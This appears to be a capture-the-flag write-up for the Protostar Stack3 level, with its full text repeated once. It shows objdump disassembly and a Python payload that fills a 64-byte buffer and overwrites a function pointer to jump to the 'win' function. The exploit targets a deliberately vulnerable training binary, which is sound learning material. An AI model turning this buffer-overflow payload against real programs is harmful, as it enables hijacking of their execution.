Protostar 0x03 - Stack3
Prev: 0x02 - Stack2
Next: 0x04 - Stack4
In this level, the objective is to redirect program flow. If we are able to overwrite the "fp" variable with a function pointer, the final "if" statement in the program code tells us that we will execute the the function at that address.
Let's try to overwrite "fp" with the address of "win." We can do this one of two ways: first, with gdb which we've used previously (enter "disas win"), or with "objdump." Let's try something new, and call "objdump" with the "-d" switch to disassemble all executable sections of the "stack3" program.
$ objdump -d stack3
...
8048424 <win>:
8048424: 55 push %ebp
8048425: 89 e5 mov %esp,%ebp
8048427: 83 ec 18 sub $0x18,%esp
804842a: c7 04 24 40 85 04 08 movl $0x8048540,(%esp)
8048431: e8 2a ff ff ff call 8048360 <puts@plt>
8048436: c9 leave
8048437: c3
...
So, it looks like the address we're aiming for is 0x08048424. Let's craft another Python script similar to the one in previous levels. We'll build a payload that (1) fills our 64-byte buffer and (2) overwrites the "fp" variable (which we can see immediately follows the "buffer" variable) with the address of "win."
import struct
buffer = "A" * 64
win = struct.pack("<I", 0x08048424)
payload = buffer + win
print payload
Now, we just need to execute this script with Python and pipe the output into the "stack3" function:
$ python stack3.py | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
Prev: 0x02 - Stack2
Next: 0x04 - Stack4
Next: 0x04 - Stack4
In this level, the objective is to redirect program flow. If we are able to overwrite the "fp" variable with a function pointer, the final "if" statement in the program code tells us that we will execute the the function at that address.
Let's try to overwrite "fp" with the address of "win." We can do this one of two ways: first, with gdb which we've used previously (enter "disas win"), or with "objdump." Let's try something new, and call "objdump" with the "-d" switch to disassemble all executable sections of the "stack3" program.
$ objdump -d stack3
...
8048424 <win>:
8048424: 55 push %ebp
8048425: 89 e5 mov %esp,%ebp
8048427: 83 ec 18 sub $0x18,%esp
804842a: c7 04 24 40 85 04 08 movl $0x8048540,(%esp)
8048431: e8 2a ff ff ff call 8048360 <puts@plt>
8048436: c9 leave
8048437: c3
...
So, it looks like the address we're aiming for is 0x08048424. Let's craft another Python script similar to the one in previous levels. We'll build a payload that (1) fills our 64-byte buffer and (2) overwrites the "fp" variable (which we can see immediately follows the "buffer" variable) with the address of "win."
import struct
buffer = "A" * 64
win = struct.pack("<I", 0x08048424)
payload = buffer + win
print payload
Now, we just need to execute this script with Python and pipe the output into the "stack3" function:
$ python stack3.py | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
Prev: 0x02 - Stack2
Next: 0x04 - Stack4